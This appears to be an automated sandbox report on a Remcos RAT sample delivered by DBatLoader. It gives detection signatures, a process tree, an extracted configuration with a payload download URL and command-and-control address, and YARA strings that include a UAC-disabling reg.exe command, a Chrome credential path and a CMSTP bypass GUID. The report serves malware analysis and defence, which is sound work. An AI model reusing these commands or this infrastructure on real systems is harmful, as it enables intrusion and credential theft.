Edit tour

Windows Analysis Report
HGTQP09643009.scr.exe

Overview

General Information

Sample name:	HGTQP09643009.scr.exe
Analysis ID:	1441701
MD5:	c8b0899dd51c7516316ed413771e71c4
SHA1:	e9e407a9a7f7655940b1a7b48ac02b740d004004
SHA256:	841200c9e115b489adb33d27e4fcd1f6769609e5c378a45ef1d371200bd9a41c
Tags:	exeModiLoaderRemcos
Infos:

Detection

Remcos, DBatLoader, PrivateLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Snort IDS alert for network traffic

Yara detected DBatLoader

Yara detected PrivateLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Creates a thread in another existing process (thread injection)

Delayed program exit found

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Child Processes Of SndVol.exe

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

HGTQP09643009.scr.exe (PID: 5900 cmdline: "C:\Users\user\Desktop\HGTQP09643009.scr.exe" MD5: C8B0899DD51C7516316ED413771E71C4)

extrac32.exe (PID: 5948 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)

SndVol.exe (PID: 6352 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)

SndVol.exe (PID: 5480 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr" MD5: BD4A1CC3429ED1251E5185A72501839B)

SndVol.exe (PID: 4688 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)

SndVol.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)

SndVol.exe (PID: 6804 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)

SndVol.exe (PID: 5680 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx" MD5: BD4A1CC3429ED1251E5185A72501839B)

Jsqwmpul.PIF (PID: 6804 cmdline: "C:\Users\Public\Libraries\Jsqwmpul.PIF" MD5: C8B0899DD51C7516316ED413771E71C4)

colorcpl.exe (PID: 5900 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

Jsqwmpul.PIF (PID: 2172 cmdline: "C:\Users\Public\Libraries\Jsqwmpul.PIF" MD5: C8B0899DD51C7516316ED413771E71C4)

SndVol.exe (PID: 1080 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng"]}

Threatname: Remcos

{"Host:Port:Password": "107.175.229.139:8087:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TLPQMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c375:$a1: Remcos restarted by watchdog! 0x6c8ed:$a3: %02i:%02i:%02i:%03i
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x663c9:$str_a1: C:\Windows\System32\cmd.exe 0x66345:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66345:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66845:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x67075:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66439:$str_b2: Executing file: 0x674b9:$str_b3: GetDirectListeningPort 0x66e65:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66fe5:$str_b7: \update.vbs 0x66461:$str_b9: Downloaded file: 0x6644d:$str_b10: Downloading file: 0x664f1:$str_b12: Failed to upload file: 0x67481:$str_b13: StartForward 0x674a1:$str_b14: StopForward 0x66f3d:$str_b15: fso.DeleteFile " 0x66ed1:$str_b16: On Error Resume Next 0x66f6d:$str_b17: fso.DeleteFolder " 0x664e1:$str_b18: Uploaded file: 0x664a1:$str_b19: Unable to delete: 0x66f05:$str_b20: while fso.FileExists(" 0x6697e:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x662b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x66249:$s1: CoGetObject 0x6625d:$s1: CoGetObject 0x66279:$s1: CoGetObject 0x70205:$s1: CoGetObject 0x66209:$s2: Elevation:Administrator!new:
0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c375:$a1: Remcos restarted by watchdog! 0x6c8ed:$a3: %02i:%02i:%02i:%03i
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x663c9:$str_a1: C:\Windows\System32\cmd.exe 0x66345:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66345:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66845:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x67075:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66439:$str_b2: Executing file: 0x674b9:$str_b3: GetDirectListeningPort 0x66e65:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66fe5:$str_b7: \update.vbs 0x66461:$str_b9: Downloaded file: 0x6644d:$str_b10: Downloading file: 0x664f1:$str_b12: Failed to upload file: 0x67481:$str_b13: StartForward 0x674a1:$str_b14: StopForward 0x66f3d:$str_b15: fso.DeleteFile " 0x66ed1:$str_b16: On Error Resume Next 0x66f6d:$str_b17: fso.DeleteFolder " 0x664e1:$str_b18: Uploaded file: 0x664a1:$str_b19: Unable to delete: 0x66f05:$str_b20: while fso.FileExists(" 0x6697e:$str_c0: [Firefox StoredLogins not found]
00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x662b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x66249:$s1: CoGetObject 0x6625d:$s1: CoGetObject 0x66279:$s1: CoGetObject 0x70205:$s1: CoGetObject 0x66209:$s2: Elevation:Administrator!new:
00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Process Memory Space: SndVol.exe PID: 6352	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: SndVol.exe PID: 6352	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: SndVol.exe PID: 6352	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: SndVol.exe PID: 6352	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x154d3:$a1: Remcos restarted by watchdog! 0x34c25:$a1: Remcos restarted by watchdog! 0x15a2d:$a3: %02i:%02i:%02i:%03i 0x15e5c:$a3: %02i:%02i:%02i:%03i 0x3517f:$a3: %02i:%02i:%02i:%03i 0x355ae:$a3: %02i:%02i:%02i:%03i
Process Memory Space: SndVol.exe PID: 5480	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: colorcpl.exe PID: 5900	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: colorcpl.exe PID: 5900	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: colorcpl.exe PID: 5900	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb379:$a1: Remcos restarted by watchdog! 0x24fbb:$a1: Remcos restarted by watchdog! 0xb8d3:$a3: %02i:%02i:%02i:%03i 0xbd02:$a3: %02i:%02i:%02i:%03i 0x25515:$a3: %02i:%02i:%02i:%03i 0x25944:$a3: %02i:%02i:%02i:%03i
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.HGTQP09643009.scr.exe.2900000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
3.2.SndVol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
3.2.SndVol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.6f80000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6f80000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.6f80000.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.6f80000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b775:$a1: Remcos restarted by watchdog! 0x6bced:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.6f80000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x657c9:$str_a1: C:\Windows\System32\cmd.exe 0x65745:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65745:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65c45:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66475:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65839:$str_b2: Executing file: 0x668b9:$str_b3: GetDirectListeningPort 0x66265:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x663e5:$str_b7: \update.vbs 0x65861:$str_b9: Downloaded file: 0x6584d:$str_b10: Downloading file: 0x658f1:$str_b12: Failed to upload file: 0x66881:$str_b13: StartForward 0x668a1:$str_b14: StopForward 0x6633d:$str_b15: fso.DeleteFile " 0x662d1:$str_b16: On Error Resume Next 0x6636d:$str_b17: fso.DeleteFolder " 0x658e1:$str_b18: Uploaded file: 0x658a1:$str_b19: Unable to delete: 0x66305:$str_b20: while fso.FileExists(" 0x65d7e:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6f80000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x656b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65649:$s1: CoGetObject 0x6565d:$s1: CoGetObject 0x65679:$s1: CoGetObject 0x6f605:$s1: CoGetObject 0x65609:$s2: Elevation:Administrator!new:
3.2.SndVol.exe.5350000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.5350000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.5350000.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.5350000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c375:$a1: Remcos restarted by watchdog! 0x6c8ed:$a3: %02i:%02i:%02i:%03i
